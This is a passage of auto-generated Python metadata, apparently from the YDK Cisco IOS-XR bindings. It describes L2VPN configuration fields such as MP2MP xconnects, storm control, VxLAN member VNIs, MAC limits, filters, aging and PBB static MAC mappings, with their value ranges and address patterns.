'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
False,
[
_MetaInfoClassMember('ce-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Customer Edge Identifier
''',
'ce_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ceids', REFERENCE_CLASS, 'Ceids' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
[], [],
''' Local Customer Edge Identifier Table
''',
'ceids',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable signaling protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable auto-discovery
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-policy', REFERENCE_CLASS, 'Mp2MpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
[], [],
''' Route policy
''',
'mp2mp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-targets', REFERENCE_CLASS, 'Mp2MpRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
[], [],
''' Route Target
''',
'mp2mp_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-signaling-protocol', REFERENCE_CLASS, 'Mp2MpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
[], [],
''' signaling protocol in this MP2MP
''',
'mp2mp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 26)], [],
''' Name of the multi point to multi point
xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-auto-discovery', REFERENCE_CLASS, 'Mp2MpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
[], [],
''' auto-discovery in this MP2MP
''',
'mp2mp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable control word
''',
'mp2mp_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'mp2mp_interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown this MP2MP VPWS instance
''',
'mp2mp_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpl2-encapsulation', REFERENCE_ENUM_CLASS, 'L2EncapsulationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2EncapsulationEnum',
[], [],
''' Configure Layer 2 Encapsulation
''',
'mp2mpl2_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpmtu', ATTRIBUTE, 'int' , None, None,
[('64', '65535')], [],
''' Maximum transmission unit for this MP2MP
VPWS instance
''',
'mp2mpmtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpvpn-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'mp2mpvpn_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
False,
[
_MetaInfoClassMember('mp2mp-xconnect', REFERENCE_LIST, 'Mp2MpXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
[], [],
''' Multi point to multi point xconnect
''',
'mp2mp_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the xconnect group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-xconnects', REFERENCE_CLASS, 'Mp2MpXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
[], [],
''' List of multi point to multi point xconnects
''',
'mp2mp_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-xconnects', REFERENCE_CLASS, 'P2PXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
[], [],
''' List of point to point xconnects
''',
'p2p_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups',
False,
[
_MetaInfoClassMember('xconnect-group', REFERENCE_LIST, 'XconnectGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup',
[], [],
''' Xconnect group
''',
'xconnect_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-control',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
False,
[
_MetaInfoClassMember('bd-storm-control', REFERENCE_LIST, 'BdStormControl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
[], [],
''' Storm Control Type
''',
'bd_storm_control',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-controls',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
False,
[
_MetaInfoClassMember('mac-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'mac_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('next-hop-ip', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Enable Static Mac Address Configuration
''',
'next_hop_ip',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
False,
[
_MetaInfoClassMember('member-vni-static-mac-address', REFERENCE_LIST, 'MemberVniStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'member_vni_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
False,
[
_MetaInfoClassMember('vni', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' VxLAN Network Identifier number
''',
'vni',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('member-vni-static-mac-addresses', REFERENCE_CLASS, 'MemberVniStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'member_vni_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
False,
[
_MetaInfoClassMember('member-vni', REFERENCE_LIST, 'MemberVni' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
[], [],
''' Bridge Domain Member VxLAN Network
Identifier
''',
'member_vni',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vnis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
False,
[
_MetaInfoClassMember('bd-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'bd_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'bd_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' Mac Address Limit Notification
''',
'bd_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('drop', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC address for filtering
''',
'drop',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filter',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
False,
[
_MetaInfoClassMember('bd-mac-filter', REFERENCE_LIST, 'BdMacFilter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
[], [],
''' Static MAC address
''',
'bd_mac_filter',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filters',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
False,
[
_MetaInfoClassMember('bd-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'bd_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'bd_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
False,
[
_MetaInfoClassMember('bd-mac-aging', REFERENCE_CLASS, 'BdMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'bd_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-filters', REFERENCE_CLASS, 'BdMacFilters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
[], [],
''' Filter Mac Address
''',
'bd_mac_filters',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-learn', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'bd_mac_learn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit', REFERENCE_CLASS, 'BdMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'bd_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-port-down-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable MAC Flush when Port goes Down
''',
'bd_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Mac Withdraw
''',
'bd_mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-access-pw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC withdraw on Access PW
''',
'bd_mac_withdraw_access_pw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-behavior', REFERENCE_ENUM_CLASS, 'MacWithdrawBehaviorEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacWithdrawBehaviorEnum',
[], [],
''' MAC withdraw sent on bridge port down
''',
'bd_mac_withdraw_behavior',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-relay', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Mac withdraw sent from access PW to access
PW
''',
'bd_mac_withdraw_relay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-secure', REFERENCE_CLASS, 'MacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
[], [],
''' MAC Secure
''',
'mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable nV Satellite Settings
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('offload-ipv4-multicast-enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Multicast Offload to Satellite
Nodes
''',
'offload_ipv4_multicast_enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'nv-satellite',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone MAC address
''',
'bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mapping',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
False,
[
_MetaInfoClassMember('pbb-static-mac-mapping', REFERENCE_LIST, 'PbbStaticMacMapping' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
